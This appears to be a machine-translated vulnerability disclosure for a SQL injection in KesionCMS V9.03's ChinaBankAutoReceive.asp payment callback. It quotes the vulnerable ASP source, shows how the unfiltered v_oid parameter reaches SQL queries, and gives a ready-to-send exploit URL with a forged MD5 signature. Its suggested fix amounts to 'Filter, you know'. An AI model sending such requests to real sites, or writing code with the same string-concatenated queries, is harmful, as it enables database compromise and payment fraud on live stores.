KesionCMS V9.03 Final SQL Injection

The vulnerability exists in User/ChinaBankAutoReceive. asp <% @ LANGUAGE = "VBSCRIPT" CODEPAGE = "936" %> <% option explicit %> <! -- # Include file = "../Conn. asp" --> <! -- # Include file = "../Plus/md5.asp" --> <! -- # Include file = "../KS_Cls/Kesion. MemberCls. asp" --> <! -- # Include file = "payfunction. asp "--> <% '********************************* * ******************* 'Software name: kesion CMS 9.0 'email: service@kesion.com. QQ: 111394,9537636 'Web: http://www.kesion.com http://www.kesion.cn 'Copyright (C) Kesion Network All Rights Reserved. '*************************************** * ************ Response. buffer = true Response. expires = 1 Response. cacheControl = "no-cache" Dim KSUser: Set KSUser = New UserClsDim KS: Set KS = New PublicClsDim PaymentPlat: PaymentPlat = 1 Dim RSP: Set RSP = Server. createObject ("ADODB. RECORDSET ") RSP. open "Select top 1 * From KS_PaymentPlat where id =" & PaymentPlat, conn, 1, 1If RSP. Eof ThenRSP. Close: Set RSP = NothingResponse. Write "Error! "Response. end () End IfDim AccountID: AccountID = RSP ("AccountID") Dim MD5Key: MD5Key = RSP ("MD5Key") Dim PayOnlineRate: PayOnlineRate = KS. chkClng (RSP ("Rate") Dim RateByUser: RateByUser = KS. chkClng (RSP ("RateByUser") RSP. close: Set RSP = Nothing Call ChinaBank () 'online banking return Sub ChinaBank () Dim v_oid, v_pmode, v_pstatus, v_pstring, v_string, v_amount, v_moneytype, remark2, v_md5str, text, md5text, zhuangtai 'Get the returned parameter value v_oid = request ("v _ Oid ") 'v_oid order number sent by the merchant v_pmode = request (" v_pmode ") 'payment method (string) v_pstatus = request (" v_pstatus ") 'payment status 20 (Payment successful); 30 (Payment failed) v_pstring = request ("v_pstring") 'payment result information payment completed (when v_pstatus = 20 ); cause of failure (when v_pstatus = 30); v_amount = request ("v_amount") 'actual payment amount of the Order v_moneytype = request ("v_moneytype ") 'actual payment currency of the Order remark2 = request ("remark2") 'remarks field 2v_md5str = request ("v_md5str")' Md5 verification string assembled online by online banking if request ("v_md5str ") = "" thenresponse. Write ("v_md5str: NULL") response. endend iftext = v_oid & v_pstatus & v_amount & v_moneytype & MD5Key 'md5 verification md5text = Ucase (trim (md5 (text, 32 ))) 'The Md5 verification string that merchants piece together if md5text <> v_md5str then' the Md5 verification string that online bank pieces together is compared with the Md5 verification string that merchants piece together for response. write ("error") 'tells the server that the verification fails and request to resend response. end 'interrupt program else response. write ("OK") if v_pstatus = 20 then 'payment successful Call UpdateOrder (v_amount, remark2, v_oid, v_pmode) Conn. execute ("Update KS_LogMoney Set P AymentID = 1 Where OrderID = '"& v_oid &"' ") else response. write ("error") 'tells the server that the verification fails and request to resend response. end 'interrupt program end ifend Sub %> in the above Code, v_oid = request ("v_oid") is not filtered, and then Call UpdateOrder (v_amount, remark2, v_oid, v_pmode) next let's look at UpdateOrder Sub UpdateOrder (v_amount, remark2, v_oid, v_pmode) Dim KSUser: Set KSUser = New UserCls Dim UserName, MoneyType, Money, Remark, sqlUser, rsUser, orderid, mobile, action orderid = v_oi D IF Cbool (KSUser. userLoginChecked) Then UserName = KSUser. userName Else UserName = KS. S ("UserName") '======================== if data is not obtained from the request, then the value is retained ================== If UserName = "" Then UserName = SUserNameDim UserCardIDUserCardID = KS. chkClng (KS. S ("UserCardID") iF UserCardID = 0 Then UserCardID = sUserCardIDAction = KS. G ("Action "): if Action = "" Then Action = Saction '============================== ============================ ============================== Mobile = KSUser. getUserInfo ("Mobile") Money = v_amountRemark = remark2Dim RSLog, RSSet RSLog = Server. createObject ("ADODB. RECORDSET ") RSLog. open "Select top 1 * From KS_LogMoney where orderid = '" & v_oid & "'", Conn, 1, 1if RSLog. eof And RSLog. boF ThenSelect Case Actioncase "shop" 'mall Mall Shopping Set RS = Server. createObject ("ADODB. RECORDSET ") RS. open "Select top 1 * From KS_Order Where OrderI D = '"& v_oid &"' ", Conn, 1, 3If RS. eof Then RS. close: Set RS = Nothing KS. die "<br> <li> if you encounter any problems during the payment process, contact the website administrator! "End If Mobile =" "Then Mobile = RS (" Mobile ") End If RS (" moneyreceept ") = Money If Money> = RS (" MoneyTotal ") thenRS ("PayStatus") = 1' pay ElseIf Money <> 0 ThenRS ("PayStatus") = 2' pay-as-you-go ElseRS ("PayStatus ") = 0 'unpaid End If Dim OrderStatus: OrderStatus = rs ("status") RS ("Status") = 1 RS ("PaymentPlatId") = KS. chkClng (Request ("PaymentPlat") 'payment Interface id rs ("PayTime") = now' records the payment time RS. update orderid = RS ("OrderID") Dim XID: XID = RS ("ID") Call KS. moneyInOrOut (rs ("UserName"), RS ("Contactman"), Money, 2, 1, now, rs ("orderid"), "System", "for purchase order: "& v_oid &" use "& v_pmode &" online recharge ", 0, 0) Call KS. moneyInOrOut (rs ("UserName"), RS ("Contactman"), Money, now, rs ("orderid"), "System", Remark, 0, 0) '================================ Update inventory ========================== ======= Dim rsp: set rsp=conn.exe cute ("select id, title from ks_product where id in (select proid from KS_Order Item where orderid = '"& rs (" orderid ") &"') ") do while not rsp. eof dim rsi: set rsiw.conn.exe cute ("select amount, attrid from ks_orderitem where orderid = '" & rs ("orderid") & "' and proid =" & rsp (0 )) if not rsi. eof then if OrderStatus <> 1 then' deduct inventory If RSI ("AttrID") <> 0 Then Conn. execute ("update KS_ShopSpecificationPrice set amount = amount-" & RSI (0) & "Where amount> =" & RSI (0) & "and ID =" & RSI (1 )) els E conn.exe cute ("update ks_product set totalnum = totalnum-" & rsi (0) & "where totalnum> =" & rsi (0) & "and id =" & rsp (0) End If end if rsi. close set rsi = nothing 'call KS. scoreInOrOut (UserName, 1, KS. chkClng (rsp (0) * amount, "system", "purchased item <font color = red>" & rsp ("title") & "</font> free! ", 0, 0) rsp. movenextlooprsp. closeset rsp = nothing '==================================== ================================ RS. close: Set RS = NothingIF KS. C ("UserName") <> "" Then response. redirect "User_Order.asp? Action = ShowOrder & ID = "& XIDCase else 'member center recharge Set rsUser = Server. createObject ("Adodb. recordSet ") sqlUser =" select top 1 * from KS_User where UserName = '"& UserName &"' "rsUser. open sqlUser, Conn, 1, 1if rsUser. bof and rsUser. eof thenResponse. write "<br> <li> if you encounter any problems during the recharge process, contact the website administrator! "RsUser. close: set rsUser = Nothingexit subend ifDim RealName: RealName = rsUser ("RealName") Dim Edays: Edays = rsUser ("Edays") Dim BeginDate: BeginDate = rsUser ("BeginDate ") rsUser. close: Set rsUser = Nothing If UserCardID <> 0 then' recharge card Call UpdateByCard (0, UserCardID, UserName, RealName, Edays, BeginDate, v_oid, v_pmode) Else Call KS. moneyInOrOut (UserName, RealName, Money, 3, 1, now, v_oid, "System", v_pmode & "online recharge, order number:" & v_o Id, 0, 0) End If End Select End IfRSLog. close: Set RSLog = NothingEnd Sub RSLog. open "Select top 1 * From KS_LogMoney where orderid = '" & v_oid & "'", Conn, is included in SQL! Then, can we construct parameters to trigger the vulnerability? We construct:/User/ChinaBankAutoReceive. asp? V_oid = 1% 27 & v_pstatus = 20 & v_amount = 1 & v_moneytype = 1 & v_md5str = 9B5BF7166AFBB5E1602BBCC964459B9B where v_oid is introduced into our SQL Injection statement... you know, the v_md5str is obtained from md5 (v_oid & v_pstatus & v_amount & v_moneytype & MD5Key). The MD5Key value comes from the Database Value 0. Simply put, after v_oid constructs an SQL statement, md5 (v_oid & v_pstatus & v_amount & v_moneytype & MD5Key) calculates v_md5str, and then submits it.
Solution:

Filter, you know